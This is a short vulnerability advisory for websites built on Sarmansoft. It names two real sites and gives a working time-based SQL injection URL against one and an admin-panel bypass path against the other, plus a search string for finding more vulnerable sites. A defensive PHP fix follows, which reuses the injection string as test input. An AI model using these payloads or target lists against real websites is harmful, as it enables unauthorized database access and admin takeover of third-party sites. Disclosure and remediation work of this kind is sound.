SARMANSOFT SQL - NO-REDIRECT PoC

2024.03.20
gl0cB (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

I found a no-redirect vulnerability and an SQL vulnerability on some websites prepared with Sarmansoft. In the first example, you can add the "and" "or" parameter and execute your own queries, apart from the database's own query.

SQL INJ (SLEEP) EXAMPLE:
https://passionturkey.com/neler.php?id=9%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP)

NO-REDIRECT EXAMPLE:
https://uyarlar.com.tr/admin/index.php
Replace the address with: /admin/anasayfa_ayarlari.php

To find more websites // "® Software & Technology | Sarman Soft Software and Technology Services"

My Contact Address: e7967149@gmail.com
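
One way to close both issues described above, as an added PHP 8 example that is not Sarmansoft's code or part of the original advisory: the `id` parameter is validated as an integer and bound in a prepared statement, and every admin script calls a guard that stops execution after sending the redirect. The table, column and session-key names are hypothetical, and the missing `exit` after the redirect is an assumed cause, since the advisory does not show the source.

```php
<?php
declare(strict_types=1);

// Added example. Table, column and session-key names are hypothetical;
// the advisory does not show the affected source code.

// Accept only a positive decimal integer for ?id=. Anything else, such as
// "9 AND (SELECT ...)", is rejected before it reaches the database.
function parse_id(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The id is bound as a typed parameter, so it cannot alter the query structure.
function fetch_item(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, title FROM items WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Call at the top of every admin script, not only on the login page.
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['admin_id'])) {
        header('Location: /admin/index.php', true, 302);
        exit; // assumed root cause: without exit the page body is still sent
    }
}

// Constructed demo data in an in-memory SQLite database (CLI run only).
if (PHP_SAPI === 'cli') {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)');
    $db->exec("INSERT INTO items VALUES (9, 'sample row')");

    foreach (['9', '9 AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)'] as $raw) {
        $id = parse_id($raw);
        $row = $id === null ? null : fetch_item($db, $id);
        echo $row === null ? "rejected\n" : "found: {$row['title']}\n";
    }
}
```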



Copyright 2024, cxsecurity.com

 
